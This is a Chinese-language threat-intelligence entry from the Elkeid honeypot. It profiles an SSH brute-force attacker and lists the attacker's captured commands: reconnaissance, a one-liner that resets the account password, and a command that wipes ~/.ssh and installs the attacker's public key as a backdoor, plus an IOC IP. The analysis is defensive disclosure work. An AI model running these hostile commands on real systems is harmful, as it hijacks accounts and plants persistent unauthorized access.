简述
样本关联IP频繁通过暴力破解或窃取的凭据执行 SSH 攻击,通过蜜罐采集行为可知,攻击者在ssh登陆成功后会进行信息收集、修改ssh公钥与系统用户密码。并且在蜜罐中执行行为的时间间隔分布均匀,应为攻击脚本。
样本类型
后门,控制
elkeid 样本ID
elkeid_20220609_backdoor_2
捕获时间
- 20220609
最近活跃时间
- 20221115
已知入侵途径
- ssh爆破
- ssh凭证窃取
涉及样本
- 无样本
主要行为
- 修改用户密码
bash -c echo -e q*(&%^#$SHH?M?A-k3f49!^*ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash
Elkeid 沙箱行为分析
- 信息收集
cat /proc/cpuinfo | grep name | wc -l
free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
crontab -l
w
uname -m
top
lscpu | grep Model
- 删除.ssh文件夹,重新写入公钥
bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
IOC
- 137.184.228.225
参考链接
https://www.virustotal.com/gui/ip-address/137.184.228.225/community